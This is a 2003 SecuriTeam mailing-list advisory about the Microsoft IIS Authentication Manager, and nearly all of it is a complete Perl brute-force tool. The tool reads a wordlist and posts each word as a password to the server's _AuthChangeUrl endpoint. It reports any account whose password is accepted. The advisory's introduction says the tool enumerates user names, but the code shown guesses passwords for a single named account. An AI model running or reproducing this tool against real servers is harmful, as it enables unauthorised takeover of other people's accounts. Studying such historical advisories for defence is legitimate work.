[TOOL] Microsoft IIS Authentication Manager Account Confirmation Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 05/05/03

    To: list@securiteam.com
    Date: 5 May 2003 17:33:37 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Microsoft IIS Authentication Manager Account Confirmation Vulnerability
    ------------------------------------------------------------------------

    DETAILS

    The following tool will use the aexp4b.htr script to enumerate the names
    of the users currently present on a remote server.

    Tool:
    ####################################################################
    # Microsoft IIS Authentication Manager BruteForce Tool - By JeiAr
    # http://www.gulftech.org
    ####################################################################
    # This tool can be used to brute force user accounts via dictionary attack
    # on the Microsoft IIS Authentication Manager.
    ####################################################################

    use LWP::UserAgent;

    ####################################################################
    # Time to create the new LWP User Agent, Clear the screen, And print out
    # the scripts header
    ####################################################################

    $ua = new LWP::UserAgent;
    $ua->agent("AgentName/0.1 " . $ua->agent);
    system('cls');
    &header;

    ####################################################################
    # Gather all user inputted data. Such as the domain name, host and
    # location of the wordlist
    ####################################################################
    print "Host: ";
    $host=<STDIN>;
    chomp $host;
    print "Domain: ";
    $domain=<STDIN>;
    chomp $domain;
    print "Account: ";
    $account=<STDIN>;
    chomp $account;
    print "Word List: ";
    $list=<STDIN>;
    chomp $list;

    ####################################################################
    # Opens the wordlist and puts the data into an array. afterward setting
    # the count variables
    ####################################################################

    open (DATAFILE, "$list");
    @datafile = <DATAFILE>;
    chomp(@datafile);
    $length = @datafile;
    $count = 0;
    $found = 0;

    &space;
    print "Cracked Accounts\n";
    print "----------------\n";

    ####################################################################
    # Creates the HTTP request, Checks the responses, then prints out the
    # username if it exists
    ####################################################################

    while ($count < $length) {
        $password = $datafile[$count];
        my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
        $req->content_type('application/x-www-form-urlencoded');
        $req->content("domain=$domain&acct=$account&old=$password&new=$password&new2=$password");
        my $res = $ua->request($req);
        $pattern = "Password successfully changed";
        $_ = $res->content;
        if (/$pattern/) {
            print "$account : $password\n";
            last;
        }
        $count++;
    }

    ####################################################################
    # That's all folks. Prints out the final details and footer. Rest is just
    # the subroutines :)
    ####################################################################

    &space;
    &footer;

    sub header {
        print "IIS Auth Manager Brute Forcing Tool By JeiAr [http://www.gulftech.org] \n";
        print "---------------------------------------------------------------------- \n";
    }

    sub footer {
        print "Session Results:\n";
        print "--------------------\n";
        print "Number Of Words : $length \n";
        print "Number Of Tries : $count \n";
    }

    sub space {
        print "\n" x2;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:jeiar@kmfms.com> JeiAr.
